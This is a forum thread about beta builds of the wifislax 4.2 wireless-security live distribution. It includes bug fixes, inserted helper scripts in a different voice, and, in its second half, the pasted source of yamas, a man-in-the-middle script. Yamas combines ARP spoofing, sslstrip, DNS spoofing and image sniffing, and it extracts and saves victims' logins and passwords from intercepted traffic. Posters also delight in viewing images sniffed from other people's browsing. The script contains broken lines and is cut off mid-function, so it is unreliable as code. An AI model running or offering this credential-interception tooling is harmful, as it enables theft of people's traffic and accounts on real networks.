Seguridad Wireless - Wifi
Seguridad Wireless Suite => Collaboration and development of our live distributions => Topic started by: USUARIONUEVO on 25-07-2012, 12:40 (Wednesday)
-
The only thing I think it's still missing is the hard-disk installer.
* wifislax 4.2 changelog relative to wifislax-4.1
-added library libatasmart-20100219-i486-1gsb
-added library sg3_utils-1.32-i486-1sl
-updated kde to version 4.8.4
-updated wireshark from 1.6.7 to 1.8.0
-updated wifite from beta10 to v2 r85
-added library libtar-1.2.11-i486-9sl
-added library libzip-0.9.3-i486-1
-added library gst-plugins-base-0.10.32-i486-1
-added library gstreamer-0.10.32-i486-1
-added library libffi-3.0.11-i486-1
-updated aircrack-ng suite to revision r2167
-updated firefox 10.0.2 to 14.0.1
-added umplayer-20110623-i486-1-BLACK
-added yamas yamas-20120213
-added sslstrip-0.9
-added pyOpenSSL-0.9-i486-3gsb
-added dsniff-2.4b1-i486-54.1
-added sakis3g-0.2e-wifislax
-added library db44-4.4.20-i486-2
-added library Twisted-11.0.0-runtime
-added library zope.interface-3.3.0-i686-6sl
-added suite AircrackGUI-M4-Ultimate-1.0.0-Beta2
-added library mozilla-nss-3.13.3-i486-1sl
-added youtube downloader plugin to firefox
-updated nmap from 5.01 to 6.01
-------REMOVED----
-wpa-gui, because of incompatibility with kde4 (there is no kommander)
-removed kommander (does not work in kde4)
----------------------------------------------------------------
-updated kernel from 3.3.2 to 3.4.5
-added kdm login theme
-updated wireshark from 1.8.0 to 1.8.1
-reconfigured gtk2+ theme
wallpaper [ desktop background ]
(http://img831.imageshack.us/img831/2680/defaultud.png)
Desktop loading screen [ the screen shown just before reaching the desktop ]
(http://img824.imageshack.us/img824/2974/backgroundndm.jpg)
System boot menu screen [ where we choose how to boot ]
the letters will be WHITE, and the selector bar will be blue instead of red.... it looks really good.
(http://img826.imageshack.us/img826/4144/wifislax.png)
DOWNLOAD: http://www.downloadwireless.net/isos-fase-testing/wifislax-4.2/wifislax-4.2_32bits-beta3.iso
MD5: 88af99052c79b495244d4ae8fa9521e4
-
Thanks again for your work
-
Awesome, man!! I'm downloading it and will try it... by the way, the wallpaper is amazing... this is really taking shape now haha!! at first they were a bit plain.... now it matches our spirit better hahah!!
Well, as soon as you have the hd installer it'll be a 10 hahah!! I'm used to always installing on a hd partition!
Thanks for your great work and congratulations on the effort. Now all that's left for me is to learn how to use yamas... which is no small thing...
-
Looks great!
I tried beta 2 and it only let me boot in vesa mode and with huge icons.
The Nvidia drivers didn't work for me with this beta 2 either.
Buuut with beta 3 things have changed, a lot.
It booted perfectly in auto mode and lets me change the resolution as I please.
It even detects the TV connected over HDMI, screenshot:
(http://www.subeimagenes.com/img/instantanea2-341608.png)
I've only seen a couple of faults.
Accented characters come out wrong, and on boot there is an error in KMix, screenshot:
(http://www.subeimagenes.com/img/instantanea1-341605.png)
This is turning out outstanding.
Regards.
-
The kmix thing happens to me sometimes too... it closes and that's it.
It's because sometimes when kmix starts, the sound card may not have been detected yet... or the speakers are off, etc.
The characters thing.... I noticed it --- I have to check what on earth is going on there.
-
I'll check kmix... since it belongs to kde-multimedia, and I don't think I updated that... I'll take a look, because I also remember something in autostart about it.
-
the nvidia drivers, when the kernel changes... well, that. ^-^
let's see if juvalmot is up for it... although I think he's busy with personal projects. ;)
-
Sorry for the delay, here is the nvidia driver version 304.22 beta for wifislax 4.2 kernel 3.4.5
http://www.mediafire.com/?qod46295ym6r5e7
also Java Version 7 Update 5
http://www.mediafire.com/?7lx12521j4594ki
-
very good >:(
I'm going to check it and upload it to the official site.
THE DRIVER IS PERFECT, 10 OUT OF 10 >:(
-
Usuarionuevo.... didn't you explain in another post how the hd installer was made? could you give it a try...
And if not, we wait for the program's author to show up hahah!! This is really taking shape!!
-
The installer I need is programmed in qt4, we have to wait for supremo to come back from his holidays... or for him to drop in.
-
One doubt I have... when I install it with unetbootin, afterwards I have to go into windows to run the file that is in boot... so that it becomes bootable... I know it can be done from ubuntu, which is what I manage best.... but I don't know how to run the batch file.
-
https://foro.seguridadwireless.net/wifiway/video-de-como-se-hace-un-pendrive-de-wifiway-3-0-booteable/
The third video gives an idea of how you can do it from a Linux environment
I'm on my phone too
regards
-
Thanks... it was a pain every time... leaving ubuntu... going into windows, doing it and rebooting the laptop again... ugh!!
Usuarionuevo: The updaters... I've only just noticed them and so on.... there's only the airoscript one, very necessary!! and the firefox one... no others, right?
As for the rest, I've been using it for a while and I love it!! I'm looking forward to being able to install it.
The problems I had were with accents and kmix, which showed me that message too!!
-
hi
your wishes have come true because supremo12345 is around here hehehe >:( >:( >:( >:( >:( >:(
regards
-
well, no luck, because he must not have seen the qt4 post, I'll send him a PM.
-
The odd characters... I imagine you're referring to multiattack and airoscript.
both are located in
/usr/sbin/
you can open them with kwrite, and when saving them again (without touching anything), look at the box... encoding..... set it to utf8, et voila. ^-^
-
You're a star!! >:(
-
USUARIO, or anyone else...
can you show a detail where the bad rendering of accented characters can be seen?
is it possible that it ONLY happens with terminal scripts? I remind you that things like airoscript are in 8859-15, and if you have moved to a UTF8 system, there you have it.
as for kmix, it shouldn't happen unless it's trying to connect to the Arts sound server before that has been launched. I don't know much about KDE technologies, but in backtrack development the same problem comes up sometimes.
-
PS: never mind, we've all reached the same conclusion about the character encoding hahaha
-
Here they look fine ^-^
http://www.wifislax.com/wifislax-4-2-32bits-con-kde-4-8-4-beta-3/
it must be because I rewrote it by hand hehehehe ^-^
-
exactly, the system is utf8 and the scripts are in ISO, so opening them and saving them as utf8 is enough.
-
the kmix thing is random, and it's as you say: sometimes it launches before hardware detection has finished and believes it found nothing... yet the sound works.
it's only happened to me 1 or 2 times, nothing serious.
-
sure, that document I think is in utf8 and the forum must be in iso... I'll look at that too, because otherwise copy&paste comes out really ugly.
-
in any case, USUARIO, I think (not sure) that in the KDE session properties you can delay the launch order of kmix if you find it's too much of a nuisance.
things like kmix should be the last to launch. "race conditions" are a pain...
-
kmix is launched by a kde service... it would be a matter of editing the service and, before calling kmix, giving it a 3-second sleep.
-
there's no way to edit the service that starts kmix, which is a *.desktop file thing
what I can do is remove it --- and put this in the autostart folder
#!/bin/sh
sleep 3
exec kmix
-
I've already solved it.
windows uses ISO encoding, and wifislax is all in utf8... but I've configured kwrite for ISO 8859-15, ET VOILA, now the ñ's work fine in wifislax and windows on the same document, while the wifislax system keeps using utf8. ;D
this was one of those silly tweaks I had to make.
another one I've also got done is the icons next to the clock, which in the 64-bit version were white and looked better, so that's how I put them in this beta3 of wifislax 4.2
I updated multiattack, since for x64 multiattack 1.0.7 beta 3 was made, and in the 32-bit one we had plain 1.0.7.
those are the changes I have so far... not much.
oh, and updating the package manager... with a new ftp pointing at slackware 13-37 current... where they have newer packages.
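The kwrite re-save described in this thread (scripts stored in ISO-8859-15 on a UTF-8 system) can be done for a whole directory from a script. This is an added example, not code from wifislax or from anyone in the thread; it assumes iconv is available, and the sample file it builds is constructed.

```sh
#!/bin/sh
# Added example: detect scripts saved in ISO-8859-15 and re-encode them as UTF-8.
# Same effect as re-saving in kwrite with the "utf8" encoding, but scriptable.

# is_utf8 FILE -> exit 0 if FILE decodes cleanly as UTF-8, 1 otherwise.
# iconv refuses to copy bytes that are not valid UTF-8, which is exactly the check we want.
is_utf8() {
    iconv -f UTF-8 -t UTF-8 "$1" >/dev/null 2>&1
}

# to_utf8 FILE -> converts FILE from ISO-8859-15 to UTF-8 in place, keeping FILE.iso as backup.
# Prints "already-utf8", "converted" or "failed"; returns 1 only on failure.
to_utf8() {
    f=$1
    if is_utf8 "$f"; then
        echo "already-utf8"
        return 0
    fi
    tmp=$(mktemp) || return 1
    if iconv -f ISO-8859-15 -t UTF-8 "$f" >"$tmp" 2>/dev/null; then
        cp -p "$f" "$f.iso"   # keep the original bytes around
        cat "$tmp" >"$f"      # cat rather than mv so mode and owner of $f are preserved
        rm -f "$tmp"
        echo "converted"
        return 0
    fi
    rm -f "$tmp"
    echo "failed"
    return 1
}

# convert_dir DIR -> runs to_utf8 over every *.sh in DIR (the /usr/sbin case from the thread).
convert_dir() {
    for s in "$1"/*.sh; do
        [ -f "$s" ] || continue
        printf '%s: %s\n' "$s" "$(to_utf8 "$s")"
    done
}

# Constructed sample: the word "añadido" written with ISO-8859-15 bytes (ñ = 0xF1).
make_sample() {
    d=$(mktemp -d)
    printf 'echo "a\361adido"\n' >"$d/airoscript.sh"
    echo "$d/airoscript.sh"
}

# hexbytes FILE -> the bytes on disk as one hex string, so a check can see the encoding.
hexbytes() {
    od -An -tx1 "$1" | tr -d ' \n'
}
```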
-
good evening; I registered on this forum today although I've been visiting and following your topics for a while.
today I saw this new topic and I had no choice but to register and ask USUARIONUEVO where he gets so much time and patience, when the rest of us don't even have time to try the things he puts out.
greetings to all members of this house and especially to USUARIONUEVO, who is the one that keeps us tinkering without rest.
as I said, USUARIONUEVO, we're on holiday, rest a bit.
thanks for everything.
-
Great... the way you keep updating day by day... as soon as we have that installer the betas will be over and finally the official one!! and we'll be able to install it on hdd, I can't wait haha!!
PS: Yamas works perfectly.... but there is an option for viewing the sniffed photos, or whatever it's called, and it doesn't work.... it doesn't send the images, could you look at it? I know there were images because I did it with tuenti from my phone..
-
I noticed this a while ago, it also happens in wifislax-x64
I think I found the solution but forgot to publish it
I'll check it
-
ok, you take care of that.
I'm fine-tuning little things in kde.
-
USUARIONUEVO
I suggest:
try modifying the kmix desktop file so that it runs this command:
sleep 3; exec kmix
what I don't know is whether kde uses the same desktop files for session-startup programs as for programs in general. I say this because if they are shared, every time you launch kmix by hand from the menu you'd have to wait 3 seconds no matter what, which doesn't look great, and then perhaps it's better to look for an alternative scripting solution for the particular moment of system startup.
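Instead of a blind 3-second sleep, the autostart wrapper discussed above can wait for the sound device the mixer needs and only then hand over to kmix, so a fast boot pays nothing and a slow one still works. This is an added example, not a file from wifislax or from anyone in the thread; the device path, the timeout and the script name kmix-autostart.sh are assumptions.

```sh
#!/bin/sh
# Added example: kmix autostart wrapper that resolves the "kmix starts before the
# sound card is detected" race by polling for the ALSA control node instead of sleeping.
# Meant to be saved as kmix-autostart.sh in the KDE autostart folder (assumption).

# wait_for_path PATH TRIES -> polls once per second, up to TRIES times.
# Returns 0 as soon as PATH exists, 1 if it never appeared.
wait_for_path() {
    n=0
    while [ ! -e "$1" ]; do
        n=$((n + 1))
        if [ "$n" -ge "$2" ]; then
            return 1
        fi
        sleep 1
    done
    return 0
}

# /dev/snd/controlC0 is the first ALSA mixer control device; both values are assumptions.
SND_DEV=${SND_DEV:-/dev/snd/controlC0}
MAX_TRIES=${MAX_TRIES:-10}

# Only exec kmix when run as the autostart script itself, not when sourced for testing.
if [ "${0##*/}" = "kmix-autostart.sh" ]; then
    if ! wait_for_path "$SND_DEV" "$MAX_TRIES"; then
        # Still start the mixer: the card may be detected later, and kmix copes with that.
        echo "kmix-autostart: $SND_DEV not present after $MAX_TRIES s, starting kmix anyway" >&2
    fi
    exec kmix
fi
```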
-
I've looked at it, the script was missing 2 dependencies:
http://downloadwireless.net/modulos-fase-testing/wifislax-4.2/tcpxtract_1.0.1-8.xzm
http://downloadwireless.net/modulos-fase-testing/wifislax-4.2/driftnet_0.1.6.xzm
With this it now captures the images and shows them on screen, but doesn't save them, although I think this last part is no longer our fault, but the script's own.
-
ok, thanks.
I'll include them.
-
Not saving them could be because of the path!! If you look, it sends them to root/capture....
and that path doesn't exist... it's the first thing I thought, and that's why I made the folder in case that was the problem... then I commented here... I'm going to add the modules and test with the folder created... although I won't be able to test until tomorrow since I'm not at home...
-
Supposedly the script itself should create the folder named capture_day_month_year (i.e. with the date the capture was made) and put the images in it.
This is the part of the script where it creates the folder:
if [[ $drifton = 1 ]]; #if driftnet was used
then
echo -e "\033[31mIMMA KILL THIS DRIFTNET BITCH\033[m" #It's between him and me.
if [[ ! -e $log_output_dir/capture_$(date +%d%m%y) ]]; #check if destination folder exists, since driftnet won't create one nor save images
then
mkdir $log_output_dir/capture_$(date +%d%m%y) #create if needed
fi
cp /tmp/driftnet* $log_output_dir/capture_$(date +%d%m%y) #copy all content from driftnet's temp folder to destination
killall driftnet #kill the unbeliever
elif [[ $drifton = 2 ]]; #if tcpxtract was used
then
killall tcpxtract #kill it...
fi
-
I'd like you to test this module, whoever can and wants to: http://downloadwireless.net/modulos-fase-testing/wifislax-4.2/numlockx-1.2-wifislax.xzm
What it does is start wifislax with NumLock enabled;
supposedly it should only be enabled on desktop computers, since on laptops it causes problems with the keyboard; for that, it carries a script (taken from the arch-linux repositories) that detects whether the machine is a laptop or not.
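One way to make the laptop-or-desktop decision the module needs is to read the SMBIOS chassis type that the kernel exposes under /sys/class/dmi/id/chassis_type. This is an added example and not the arch-linux script the post refers to; the file path, the script name numlock-start.sh and the test files are assumptions or constructed.

```sh
#!/bin/sh
# Added example: decide whether NumLock should be switched on at startup from the
# SMBIOS chassis type (DMI type 3). Portable chassis codes per the SMBIOS spec:
# 8 Portable, 9 Laptop, 10 Notebook, 11 Hand Held, 14 Sub Notebook,
# 30 Tablet, 31 Convertible, 32 Detachable. 1 (Other) and 2 (Unknown) are unknown.

# is_portable CHASSIS_FILE -> 0 if the machine is portable or cannot be classified,
# 1 if it is clearly a desktop-class chassis. Unknown means "leave NumLock alone",
# which is the safe default for the keyboard problem described in the thread.
is_portable() {
    ct=$(cat "$1" 2>/dev/null | tr -d ' \n')
    case "$ct" in
        8|9|10|11|14|30|31|32) return 0 ;;
        ''|1|2|*[!0-9]*)       return 0 ;;   # missing, unknown or garbage: assume portable
        *)                     return 1 ;;
    esac
}

# numlock_decision CHASSIS_FILE -> prints "on" for desktops, "off" otherwise.
numlock_decision() {
    if is_portable "$1"; then
        echo "off"
    else
        echo "on"
    fi
}

CHASSIS=${CHASSIS:-/sys/class/dmi/id/chassis_type}

# Only touch the keyboard when run as the startup script itself, not when sourced.
if [ "${0##*/}" = "numlock-start.sh" ]; then
    if [ "$(numlock_decision "$CHASSIS")" = "on" ]; then
        numlockx on   # numlockx is the tool shipped by the module linked above
    fi
fi
```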
-
Here you've lost me.... me and programming, zero, nothing at all!!
If anyone knows.... have a look.... maybe creating the folder helps... no idea... let's see if tomorrow I manage to get some error or something clear... from the terminal...
-
it saves the images for me.
.gif NO
the rest yes... BUT... YOU HAVE TO CLICK... INSIDE THE DRIFTNET WINDOW.... CLICK,, AND IT SAVES THE IMAGE IN
/root/
it should save them ALL AUTOMATICALLY, and not depend on whether you click the image or not.
I created the capture folder and the photos don't go there.
the script doesn't create the folder... and the other image-capture utility doesn't launch..
hahaha, it's so cool seeing the photos from the sites visited. >:D
I have a beta 4.... with all this already included.
-changed notification icons for white ones
-reconfigured kwrite [document write format iso]
-added updated list to the package manager
-reconfigured kmix startup
-removed 2 dead symlinks in core [ libffi ]
-removed all the charsets.gz
-fixed the odd characters problem in the shell
-added 2 yamas dependencies for image capture
-added tcpxtract_1.0.1-8 ( yamas )
-added driftnet_0.1.6 ( yamas )
I'll upload it if you want.... as you can see, most are tweaks. >:(
thanks demon.
let's see if between all of us we get yamas working 100%, and if you push me... for example go with driftnet and remove the other option from the menu,.,.. since it doesn't work, maybe a wrong path... or the name doesn't match and that's why it doesn't launch...
work for tonight... review yamas... since the rest is just waiting for the hd installer.
-
LOOK, I can test it for you because I had a mini-laptop that didn't take that well... let's see if it does now, because the numlock thing is a real pain.
thanks... going to test it.
TESTED
eeepc mini-laptop.... the keyboard is fine... nothing abnormal
asus regular laptop, the keyboard stays the same, numbers locked (obvious, since it's a laptop)
desktop... ALL OK
, putting it into beta 4 >:(
-
Perfect ;)
-
I'VE GOT YAMAS FIXED.
now it will save all the images in
/root/driftnet
it will be in beta4.
the bad thing is I've just discovered that for whatever reason the .gifs can't be viewed.
now it's time to look at what's going on with the gifs....grrrr
-
Hehe, I was on that too, how did you do it?
I put this command in:
driftnet -i $iface -a -d $log_output_dir/capture_$(date +%d%m%y) > /dev/null & driftnet -i $iface &> /dev/null &
This way tcpxtract isn't needed at all, driftnet shows the images on screen and also saves them in the folder with the date.
-
I WAS MORE BRUTAL, I THINK.
I removed the dates thing... although I liked the idea.
because the fault was that it didn't create the dated folder, so it couldn't move the images from tmp to the capture directory.
also, where it says capture directory, notice it has ~, i.e. it doesn't specify a path.
there's a line that said
cp /tmp/drftnet* $directorio_de_catura_confecha
but since it didn't create the dated path, well, it couldn't save anything.
------------
the gif images thing, it was qt4.... that's also solved now.
------
I'd like to be able to keep the option for driftnet to create the dated folder... so I'm open to your idea.
it doesn't create the dated folder for me, hence it saved nothing.
-
I've just realised something...
I changed it so it doesn't save to tmp but directly to a directory it creates beforehand in root
if you think about it... by capturing to tmp and then copying to the capture path, you're taking up twice the space, since the images are saved in 2 places
tmp + capture directory.
the middle-ground solution is to capture directly to
root/driftnet/captures with the date in the folder name.
-
I'm pasting my code... let's see if we can reach some middle ground
#!/bin/bash
# Bash script to launch man it the middle attack and sslstrip.
# version 0.9 by comaX
if [ $UID -ne 0 ]; then
echo -e "\033[31mThis program must be run as root.
This will probably fail.\033[m"
sleep 3
fi
log_output_dir=/root/driftnet
sslstrip_dir=
ask_for_install=n
if [ ! -d "$log_output_dir" ]; then
mkdir -p $log_output_dir
fi
version="20120213"
# if user ^C then execute cleanup function
trap fast_cleanup SIGINT # will prolly output errors, but that's normal since it may try killing non-existing processes.
fast_cleanup()
{
echo -e "\n\n\033[31m ^C catched. Cleaning up, then exit.\033[m"
if [[ $looparseid != "" ]];then
kill $looparseid
fi
if [[ $sslstripid != "" ]];then
kill $sslstripid
fi
if [[ $dnsid != "" ]];then
kill $dnsid
fi
if [[ $etterspoofid != "" ]];then
kill $etterspoofid
fi
if [[ "$etter" = "1" ]];then
killall ettercap
else
killall arpspoof
fi
echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
iptables --flush # there are probably too many resets here,
iptables --table nat --flush # but at least we're sure everything's clean
iptables --delete-chain
iptables --table nat --delete-chain
if [ -e '/tmp/looparse.sh' ]; then
rm /tmp/looparse.sh
fi
echo -e "\033[32m[-] Clean up successful !\033[m"
exit 0
}
#Let's define some arguments that can be passed to the script :
#generating grepcred.txt so that it doesn't have to be downloaded each time
#it was originally being downloaded so I could easily fix it, but there has
#been no fix to be done... So why use a file instead of a command line ?
#It's just much more easier this way.
echo -e "credential\nemail\nlast\nlog\nmodified\nname\nnickname\npass\npersistent\npw\nsession\ntextbox\nuser\nwebsite" > /tmp/grepcred.txt
while [ "$1" != "" ];do
case $1 in
-p | --parse)
if [[ $2 == "" ]]; then
echo -e "No input file given. Quitting. \nusage : $0 -p <file>"
exit 0
fi
clear
echo -e "Parsing $2 for credentials.\n\n"
cat $2 |
awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i; print "Website = \t"$2; getline; print $n"\n"}' |
awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
egrep -i -a -f /tmp/grepcred.txt |
awk -F "=" '{if (length($2) < 4) print "";
else if ($1 ~/Website/) print $0;
else if ($1 ~/[Pp]/) print "Password = \t"$2"\n";
else print "Login = \t"$2}' |
uniq
exit 0 ;;
-e | --etter) echo -e "\tYou will be using Ettercap instead of ARPspoof."
etter="1"
shift
sleep 0.5 ;;
-h | --help) clear
echo -e "You are running $0, version $version.
usage : $0 -h -c -p -e -s -f
-h or --help : Display this help message, disclaimer and exit.
-c or --change: Display changelog and todo.
-e : Use ettercap instead of ARPspoof. One might have one's reasons...
ARPspoof is default.
-p or --parse : Only parse the given <file>. Don't use wildcards.
Use > /output_file to print to a file.
-s : The script won't download anything. Make sure you have the needed files.
-f : Use a padlock favicon in sslstrip.
\033[31m DISCLAIMER :\033[m
This program is intended for learning purpose only. I do not condone hacking
and wouldn't be held responsible for your actions. Only you would face legal
consequences if you used this script for illegal activities.
\033[31m What I think should be learnt from this script :\033[m
This script should teach you how easy it is to steal sensitive online
credentials and how to protect you from it, provided you understand
what this program does. The best way to understand what it does is
to look at its source. This will also teach you basic shell scripting."
exit 0 ;;
-c | --change)
clear
echo -e "\033[31m Changelog :\033[m
ToDo :
- FakeSSL -> Need help
\033[31mFeatures :\033[m
- Output of credentials as they are sniffed in xterm window.
- Log parsing for user-friendly output.
- Both arpspoof and ettercap are suported
- Network mapping for host discovery.
- Can save \"dumped\" passwords to file.
- Support for multiple targets on the network.
- Can parse a single file.
- Display ASCII tables for better readability of creds.
- All options know default, pressing only enter should get you through.
- Very neat and kewl ascii =D
- Miscellaneous features
\033[31m Credits :\033[m
Credits go to all people on backtrack forums for their help and support,
and google for being my best friend with scripting.
Special kudos to ShortBuss for something I should have seen a
long time ago (sslstrip before arpspoof) and many little improvements.
And of course, to the people responsible for the tools I am using in this script.
Please criticize this program or submit ideas on the official thread at
http://tinyurl.com/yamas-bt5 or send me a mail at contact.comax@gmail.com"
exit ;;
-s | --silent)
echo "silent mode ON"
silent="1"
shift ;;
-f | --fav)
echo "favicon mode ON"
fav="-f"
shift ;;
*) shift ;;
esac
done
### Message of the day ! <= Fucking useless, but who knows, I might want to warn about something directly, or tell a joke...
if [[ "$silent" = "1" ]]; then
message="\nNo message to display : you are running in silent mode"
else
message=$(curl --silent -q http://comax.fr/yamas/bt5/message) #store it to variable
fi
if [[ $1 = "-s" || $2 = "-s" ]]; then
echo "ASCII tables won't be available."
echo "ASCII tables are not available due to the use of silent mode." > /tmp/ascii
else
wget -q http://comax.fr/yamas/bt5/ascii -O /tmp/ascii
fi
### Check for updates !
if [[ "$silent" = "1" ]];then
echo "Not checking for a new version : silent mode."
else
changelog=$(curl --silent -q http://comax.fr/yamas/bt5/changelog)
last_version=$(curl --silent -q http://comax.fr/yamas/bt5/version) #store last version number to variable
if [[ $last_version > $version ]];then # Comparing to current version
echo -e "You are running version \033[31m$version\033[m, do you want to update to \033[32m$last_version\033[m? (Y/N)
Last changes are :
$changelog"
read update
if [[ $update = Y || $update = y ]];then
echo "
wget -q http://comax.fr/yamas/bt5/yamas.sh -O $0
chmod +x $0
echo "[-] Script updated !"
if [[ $0 != '/usr/bin/yamas' && $ask_for_install = 'y' ]];then
echo -e "Do you want to install it so that you can launch it with \"yamas\" ?"
read install
if [[ $install = Y || $install = y ]];then #do not proceed to install if using installed version : updating it already "installed" it over.
cp $0 /usr/bin/yamas
chmod +x /usr/bin/yamas
echo "Script should now be installed, launching yamas !"
sleep 3
yamas
exit 1
else
echo "Ok, continuing with updated version..."
sleep 3
$0
exit 1
fi
fi
sleep 2
$0
exit 1
else
echo "Ok, continuing with current version..."
fi
else
echo "No update available"
fi
fi
### End of update process
### Install process
if [[ ! -e '/usr/bin/yamas' && $ask_for_install = 'y' ]];then
echo "Script is not installed. Do you want to install it ? (Y/N)"
read install
if [[ $install = Y || $install = y ]] ; then
cp -v $0 /usr/bin/yamas
chmod +x /usr/bin/yamas
rm $0
echo "Script should now be installed. Launching it !"
sleep 3
yamas
exit 1
else
echo "Ok, not installing then !"
fi
else
echo "Script is installed"
sleep 1
fi
### End of install process
clear
echo -e "
\`YMM' \`MM' db \`7MMM. ,MMF' db .M\"\"\"bgd
VMA ,V ;MM: MMMb dPMM ;MM: ,MI \"Y
VMA ,V ,V^MM. M YM ,M MM ,V^MM. \`MMb.
VMMP ,M \`MM M Mb M' MM ,M \`MM \`YMMNq.
MM AbmmmqMA M YM.P' MM AbmmmqMA . \`MM
MM A' VML M \`YM' MM A' VML Mb dM
.JMML..AMA. .AMMA..JML. \`' .JMML..AMA. .AMMA.P\"Ybmmd\" " # <= I love it.
echo -e "===========================================================================
=\033[31m Welcome to Yet Another MITM Automation Script.\033[m =
=\033[31m Use this tool responsibly, and enjoy!\033[m =
= Feel free to contribute and distribute this script as you please. =
= Official thread : http://tinyurl.com/yamas-bt5 =
= Check out the help (-h) to see new features and informations =
= You are running version \033[32m$version\033[m =
==========================================================================="
echo -e "\033[36mMessage of the day :\033[m"
echo -e "$message"
echo
# Starting fresh : reset IP forward and iptables
echo -e "\033[31m - Cleaning iptables \033[m"
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo "[-] Cleaned."
# Defining exit function and other ending features
cleanup()
{
echo
echo -e "\033[31m- Killing processes and resetting iptable.\033[m"
kill $sslstripid
kill $looparseid
if [[ $drifton = 1 ]]; #if driftnet was used
then
echo -e "\033[31mIMMA KILL THIS DRIFTNET BITCH\033[m" #It's between him and me.
if [[ ! -e $log_output_dir ]]; #check if destination folder exists, since driftnet won't create one nor save images
then
mkdir $log_output_dir #create if needed
fi
killall driftnet #kill the unbeliever
elif [[ $drifton = 2 ]]; #if tcpxtract was used
then
killall tcpxtract #kill it...
fi
if [[ "$etter" = "1" ]];then
killall ettercap
else
killall arpspoof
fi
echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
iptables --flush # there are probably too many resets here,
iptables --table nat --flush # but at least we're sure everything's clean
iptables --delete-chain
iptables --table nat --delete-chain
rm /tmp/looparse.sh
echo -e "\033[32m[-] Clean up successful !\033[m"
echo -e "\nDo you want to keep the whole log file for further use or shall we delete it? (Y=keep)"
echo "(If you want to keep it, it will be stored in $log_output_dir/$filename.txt)"
read -e keep
if [[ $keep = "Y" || $keep = "y" ]];then # double brackets because double condition. || signifies "or"
cp /tmp/$filename.txt $log_output_dir/$filename.txt #moving file
if [ -f "$log_output_dir/$filename.txt" ]; then #check if it exists
echo "Log file copied !" #it does
else echo "Error while copying log file. Go check /tmp/ for $filename.txt" #it does not
fi
else
echo "Logs not saved"
fi
echo -e "\nDo you want to save passwords to a file? (Y=keep)"
echo "(If you want to keep it, it will be saved in $log_output_dir/$filename.pass.txt)"
read -e keeppd
if [[ $keeppd = "Y" || $keeppd = "y" ]];then # double brackets because double condition. || signifies "or"
cat /tmp/$filename.txt |
awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i; print "Website = \t"$2; getline; print $n"\n"}' |
awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
egrep -i -a -f /tmp/grepcred.txt |
awk -F "=" '{if (length($2) < 4) print "";
else if ($1 ~/Website/) print $0;
else if ($1 ~/[Pp]/) print "Password = \t"$2"\n";
else print "Login = \t"$2}' |
uniq >> $log_output_dir/$filename.pass.txt # >> appends to a potential previous file.
if [ -f "$log_output_dir/$filename.pass.txt" ]; then #check if it exists
echo "Passwords saved !" #it does
else
echo "Error while saving passwords" #it does not
fi
else
echo "Password saving skipped."
fi
rm /tmp/$filename.txt
echo -e "\nTemporary files deleted."
if [[ -f "/usr/bin/yamas" && $ask_for_install != 'y' ]];then #check if script is already installed
echo -e "\n\n"
exit 1 #if yes, exit.
else
echo "This script is not installed yet. Do you wish to install it, so that you can reuse it later on by simply issuing 'yamas' in console? (Y/N)"
read -e install
case $install in
Y | y | yes)
cp $0 /usr/bin/yamas #copy and rename script
echo -e "\033[32m Script installed !\033[m" ;;
*) echo "Script not installed." ;;
esac
fi
exit 1
}
search=$(ip route show | awk '(NR == 2) { print $1}') #store gateway/24 for whole network mapping to variable
#We put it here in the middle, because it could be used two times, but the gateway shouldn't change,
#so there is no need to do it twice.
rescan ()
{
echo -e "\033[31m"
nmap -sn $search | grep report | awk -F for '{ print $2 }' #host discovery
echo -en "\033[m"
final
}
add_target()
{
echo "Enter a new IP address to attack :"
read newip
xterm -geometry 90x3-1-1 -T "Poisoning $newip" -e arpspoof -i $iface -t $newip $gateway 2>/dev/null & sleep 2
final
}
ascii()
{
clear
cat /tmp/ascii
rm /tmp/ascii
final
}
dns_spoof()
{
### Make Host function###
mkhst()
{
echo "Enter your redirection list line by line. End with #.
Usage is : 127.0.0.1 foo.bar.com
Wildcards may be used."
rm ~/hosts_spoof
while :
do
read input
echo "$input" >> ~/hosts_spoof
if [[ $input == "#" ]];then
break
fi
done
}
###EOfunc###
echo "If you already have a host file, enter its path. If you don't, press enter."
read gothost
if [[ $gothost != "" ]];then
echo "Host file $gothost will be used."
else
echo -e "We'll make one...\n"
mkhst
fi
xterm -geometry 90x3-1-1 -T "DNS spoofing" -e dnsspoof -i $iface -f ~/hosts_spoof & dnsid=$!
}
choose_dns()
{
echo "Would you like to use Ettercap 'dns_spoof' plugin or dnsspoof (E/D) ? Press a to abort"
read spoofpgm
case $spoofpgm in
E) echo "We'll use ettercap. Make sure to have edited /usr/share/ettercap/etter.dns"
ettercap -D -q -i $iface -T -P dns_spoof & etterspoofid=$! ;;
D) echo "We'll use dnsspoof."
dns_spoof ;;
a | A) final ;;
*) echo "Wrong choice. Please use E or D"
choose_dns;;
esac
final
}
misc()
{
echo -e "\nHere are the miscellaneous features.
1. Image sniffing
2. DNS spoofing
3. Previous menu."
read misc
case $misc in
1) image_menu
final ;;
2) choose_dns ;;
3) final ;;
*) echo "bad choice"
misc ;;
esac
}
image_menu()
{
echo -e "Would you rather use driftnet (display images) or tcpxtract ?
1. Tcpxtract (saves all images to $log_output_dir/capture[date])
2. Driftnet (Display images on screen and save all images to $log_output_dir/capture[date])"
read image_choice
case $image_choice in
1) tcpxtract -d $iface -o $log_output_dir/capture_$(date +%d%m%y) > /dev/null & tcpid=$!
drifton=2
echo "tcpxtract is launched with pid $tcpid"
misc ;;
2) driftnet -i $iface -d $log_output_dir &> /dev/null &
drifton=1
echo "Driftnet launched."
misc ;;
esac
}
rtparse()
{
echo -e "\n\nIn this menu, you can pause, resume, kill, or launch
realtime parsing (RTP).
1. Pause RTP (keep xterm open for you to read, copypasta, etc.)
2. Resume RTP.
3. Kill RTP (stop and close xterm)
4. Re-launch RTP
5. Previous menu."
read rtp
case $rtp in # not sure if this should be quote enclosed...anyone want to help out? It's singular options without a space, so I think the need for quotes is NOT needed??
1) echo -e "\033[33m
kill -19 $looparseid
echo -e "\033[33m[-]Paused.\033[m"
rtparse;;
2) echo -e "\033[33m
